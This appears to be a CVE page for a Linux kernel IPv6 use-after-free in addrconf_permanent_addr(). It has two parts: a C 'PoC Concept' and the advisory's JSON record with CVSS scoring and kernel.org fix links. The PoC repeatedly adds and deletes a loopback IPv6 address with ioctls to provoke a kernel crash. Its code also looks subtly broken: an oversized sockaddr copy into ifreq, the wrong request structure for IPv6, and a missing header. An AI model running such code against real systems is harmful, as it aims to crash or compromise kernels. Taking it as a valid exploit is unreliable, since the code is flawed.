CVE-2026-43339

// CVE-2026-43339 PoC Concept // This PoC demonstrates the context of the vulnerability in Linux Kernel IPv6 handling. // Note: Triggering the specific UaF requires exact kernel version and race condition timing. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/if.h> #include <netinet/in.h> #include <arpa/inet.h> #define IPV6_ADDR_GEN_MODE 0 int main() { int sock; struct ifreq ifr; struct sockaddr_in6 addr; // Create a socket for IPv6 communication sock = socket(AF_INET6, SOCK_DGRAM, 0); if (sock < 0) { perror("socket"); return 1; } // Setup interface name (e.g., eth0) strcpy(ifr.ifr_name, "lo"); // Using loopback for safety // Attempt to trigger addrconf_permanent_addr logic // by manipulating IPv6 addresses rapidly to induce the race condition. memset(&addr, 0, sizeof(addr)); addr.sin6_family = AF_INET6; inet_pton(AF_INET6, "::1", &addr.sin6_addr); memcpy(&ifr.ifr_addr, &addr, sizeof(addr)); // Loop to stress the address configuration path for(int i = 0; i < 1000; i++) { ioctl(sock, SIOCSIFADDR, &ifr); ioctl(sock, SIOCDIFADDR, &ifr); } close(sock); printf("PoC execution finished. Check kernel logs for crashes.\n"); return 0; }

{"cve": {"id": "CVE-2026-43339", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T14:16:43.777", "lastModified": "2026-05-11T08:16:10.293", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: prevent possible UaF in addrconf_permanent_addr()\n\nThe mentioned helper try to warn the user about an exceptional\ncondition, but the message is delivered too late, accessing the ipv6\nafter its possible deletion.\n\nReorder the statement to avoid the possible UaF; while at it, place the\nwarning outside the idev->lock as it needs no protection."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/25357b670afb5b517096da783abaa5cc4bf8359e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/2d88ed7fa000e19c2dc0fa31b3a849e3f5bca5c1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/3cd4efb5df72843dfac892d0b3c7a4a8bd926b65", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/7bfafa1b0cd582983ebec6bb20f0a435528fe567", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/7d9f2f4aabd116ca68fbdab5d8fb8dac74c2ea1e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/bacc7f31085c9820922f00bc7d79756ffa13123a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/eec49a33611f20336b357b3953df44f1a02049e8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/fd63f185979b047fb22a0dfc6bd94d0cab6a6a70", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}